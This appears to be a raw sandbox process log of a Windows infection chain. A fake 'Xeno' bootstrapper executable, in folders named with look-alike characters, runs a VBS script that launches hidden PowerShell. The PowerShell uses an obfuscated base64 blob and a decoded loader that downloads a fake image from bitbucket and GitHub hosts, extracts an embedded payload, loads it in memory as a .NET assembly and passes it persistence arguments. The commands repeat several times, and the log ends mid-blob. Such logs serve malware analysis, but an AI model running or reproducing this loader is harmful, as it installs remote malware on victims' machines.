"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#Jw#g#HQ#e#B0#C4#c#BB#Gk#c#Bt#GI#Zw#v#HM#Z#Bh#G8#b#Bu#Hc#bwBk#C8#dwBx#HQ#cgBl#HQ#cgBl#C8#awBy#HU#cgBl#G0#b#B1#HI#LwBn#HI#bw#u#HQ#ZQBr#GM#dQBi#HQ#aQBi#C8#Lw#6#HM#c#B0#HQ#a##n#Cw#I##n#D##Jw#s#C##JwBT#HQ#YQBy#HQ#dQBw#E4#YQBt#GU#Jw#s#C##JwBN#HM#YgB1#Gk#b#Bk#Cc#L##g#Cc#M##n#Ck#KQB9#H0#';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] (' txt.pAipmbg/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
C:\Users\Admin\Downloads\BoًоtstrарреrV1.0.88\Ехec\Ехec\XenoV1.0.88.exe
"C:\Users\Admin\Downloads\BoًоtstrарреrV1.0.88\Ехec\Ехec\XenoV1.0.88.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c 671cd2b750753.vbs
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\671cd2b750753.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#Jw#g#HQ#e#B0#C4#c#BB#Gk#c#Bt#GI#Zw#v#HM#Z#Bh#G8#b#Bu#Hc#bwBk#C8#dwBx#HQ#cgBl#HQ#cgBl#C8#awBy#HU#cgBl#G0#b#B1#HI#LwBn#HI#bw#u#HQ#ZQBr#GM#dQBi#HQ#aQBi#C8#Lw#6#HM#c#B0#HQ#a##n#Cw#I##n#D##Jw#s#C##JwBT#HQ#YQBy#HQ#dQBw#E4#YQBt#GU#Jw#s#C##JwBN#HM#YgB1#Gk#b#Bk#Cc#L##g#Cc#M##n#Ck#KQB9#H0#';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] (' txt.pAipmbg/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
C:\Users\Admin\Downloads\BoًоtstrарреrV1.0.88\Ехec\Ехec\XenoV1.0.88.exe
"C:\Users\Admin\Downloads\BoًоtstrарреrV1.0.88\Ехec\Ехec\XenoV1.0.88.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c 671cd2b750753.vbs
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\671cd2b750753.vbs"
C:\Users\Admin\Downloads\BoًоtstrарреrV1.0.88\Ехec\Ехec\XenoV1.0.88.exe
"C:\Users\Admin\Downloads\BoًоtstrарреrV1.0.88\Ехec\Ехec\XenoV1.0.88.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##